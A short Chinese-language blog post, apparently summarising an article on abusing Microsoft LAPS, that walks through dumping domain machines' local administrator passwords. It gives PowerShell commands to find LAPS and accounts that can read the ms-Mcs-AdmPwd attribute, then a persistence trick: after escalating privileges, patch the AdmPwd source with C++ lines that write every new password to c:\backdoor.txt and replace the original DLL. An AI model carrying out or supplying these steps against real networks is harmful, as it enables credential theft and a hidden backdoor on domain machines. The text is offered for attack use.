Dump LAPS明文密码

大多数时候,我们都会选择从服务端获取密码,而服务端往往有较高的安全性。LAPS(local administrator password solution)用于管理加入了域的机器的administrator密码,是一个组策略客户端扩展(Group Policy Client Side)。LAPS用于在没有域账号(或者其他原因)又要该机器入网的情况。

dump laps 明文密码:

  • 首先识别目标机上是否有安装LAPS

Get-ChildItem ‘c:\program files\LAPS\CSE\Admpwd.dll’

  • 当前用户是否对ms-MS-AdmPwd有访问权限

Get-NetOU -FullData | Get-ObjectAcl -ResolveGUIDs |Where-Object {($_.ObjectType -like ‘ms-Mcs-AdmPwd’) -and($_.ActiveDirectoryRights -match ‘ReadProperty’)}

当装有当前RSAT(Remote Server Administration Tools) 时,可用以下方法判断是否具备read access

dsacls.exe ‘Path to the AD DS Object’

当装有当前RSAT(Remote Server Administration Tools) 时,可用以下方法判断是否具备read accessdsacls.exe ‘Path to the AD DS Object’

找到对ms-MS-AdmPwd具有访问权限的账户,开始愉快的dump~

替换dll文件,以进行权限维持

LAPS 基于15年的开源项目AdmPwd,我们可以利用该向其中添加额外的代码进行编译替换,从而达到获取最新密码的目的。

获取管理权限:通过LPE或者其他方式

在新密码和时间戳报告给AD的位置添加以下代码并进行编译:

wofstream backdoor;

backdoor.open(“c:\\backdoor.txt”);

backdoor << newPwd;backdoor.close();

使用编译后的文件替换原始dll文件

原文:https://movaxbx.ru/2019/02/11/malicious-use-of-microsoft-laps/

为您推荐

发表评论

电子邮件地址不会被公开。 必填项已用*标注

7 − 2 =